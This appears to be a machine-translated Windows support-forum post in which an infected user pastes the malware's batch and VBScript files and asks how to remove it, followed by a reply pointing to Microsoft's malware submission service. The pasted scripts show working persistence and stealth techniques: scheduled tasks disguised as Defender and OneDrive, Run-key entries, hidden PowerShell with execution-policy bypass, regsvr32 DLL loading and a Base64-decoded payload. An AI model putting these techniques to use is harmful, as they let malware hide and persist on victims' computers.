windows 10:ウイルスが変更したものを元に戻し、起動時に開かないようにする方法.
ウイルスを停止するたびにウイルスが停止しなかったためにストレスを受けた後、それをインストールしたプログラムからファイルのチェックを開始しました(アンチウイルスがこれを修正していないため、:()が見つかり、次のことがわかりました:
最初に開くのは、プログラムを実行しようとしたときに開くlauncher.batです.これは次のように動作します:
cd ..&& cd data && cd source && cd data1 && cd data2
xcopy/s/Y data3C:\Users\Public\Music/E/H
cd data3 && cd bin
schtasks/create/tn "onedrive
32"/tr "cmd/c start/minC:\Users\Public\Music\bin\java.bat"/sc min/mo 2/F
schtasks/create/tn "WindowsPhotos"/tr "cmd/c start/minC:\Users\Public\Music\bin\ghost.exe"/sc min/mo 33/F
schtasks/create/tn "Defender"/tr "regsvr32.exe/s/i:shellcode、LINK:csC:\Users\Public\Music\bin\64.dll"/sc min/mo 32/F
wscript.exe service.vbs && wscript.exe java.vbs
ghost.exeを起動します
attrib + hC:\Users\Public\Music
終了
「Defender」、「WindowsPhotos」、「onedrive
32」を変更します.また、その「ghost.exe」の実行を開始し、githubからのコードのような他のものをインストールします.これをすべて元に戻し、ウイルスとコマンドを停止し、他のファイルも表示したい
C:\Users\Public\Music\bin \ディレクトリにあり、非表示になっています(隠しファイルは常に非表示ではないので、ありがたいことにすべて見つかりました.)
java.vbsの実行:
const CONSOLE_HIDE=0
const CONSOLE_SHOW=1
const CMD_WAIT=true
set O=CreateObject( "Wscript.Shell")
D="HKCU\jaava"
H="cmd/c start/minC:\Users\Public\Music\bin\java.bat"
O.regwrite D、H、 "REG_SZ"
O.regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\cleaner"、U& "cmd.exe/c powershell-ExecutionPolicy Bypass-Windowstyle hidden-command"&chrw(34)& "$ y=(get-itemproperty-path 'HKCU:\'-name 'jaava').jaava; cmd/c $ y "&Chrw(34)、" REG_SZ "
O.Run "powershell-ExecutionPolicy Bypass-Windowstyle hidden-command"&chrw(34)& "$ y =(get-itemproperty-path 'HKCU:\'-name 'jaava').jaava; cmd/c $ y "&Chrw(34)、0、false
Java.batも確認しました:
cdC:\Users\Public\Music\bin && start/min jjs.bat && exit
そしてjjs.bat:
echo eval(new java.lang.String(java.util.Base64.decoder.decode( ''))));|powershell.exe-WindowStyle HiddenC:\Users\Public\Music\bin\svchost.exe
(( '')の内側には、ランダムな文字と数字の非常に長いテキストが入りますが、入れたくありません.何かの助けになるとは思いません)
Service.vbsも確認しました:
const CONSOLE_HIDE=0
const CONSOLE_SHOW=1
const CMD_WAIT=true
set O=CreateObject( "Wscript.Shell")
D="HKCU\alien34"
H="regsvr32.exe/s/i:shellcode、LINK:csC:\Users\Public\Music\bin\64.dll"
O.regwrite D、H、 "REG_SZ"
O.regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\onedrive
32"、U& "cmd.exe/c powershell-ExecutionPolicy Bypass-Windowstyle hidden-command"&chrw (34)& "$ y =(get-itemproperty-path 'HKCU:\'-name 'alien34').alien34; cmd/c $ y"&Chrw(34)
、「REG_SZ」
O.Run "powershell-ExecutionPolicy Bypass-Windowstyle hidden-command"&chrw(34)& "$ y =(get-itemproperty-path 'HKCU:\'-name 'alien34').alien34; cmd/c $ y "&Chrw(34)、0、false
他に確認する必要がある場合は、教えてください.他に見つけた場合はコメントで投稿します
返信リスト(回答:1)
これらのフォーラムは、マルウェアサンプルの提出ではなく、消費者がマイクロソフト製品のセキュリティとその運用に関する問題について支援を得ることができるフォーラムです.
これは次のように行うとより適切になります.
マルウェア分析のためにファイルを送信する-マイクロソフトセキュリティインテリジェンス
ロブ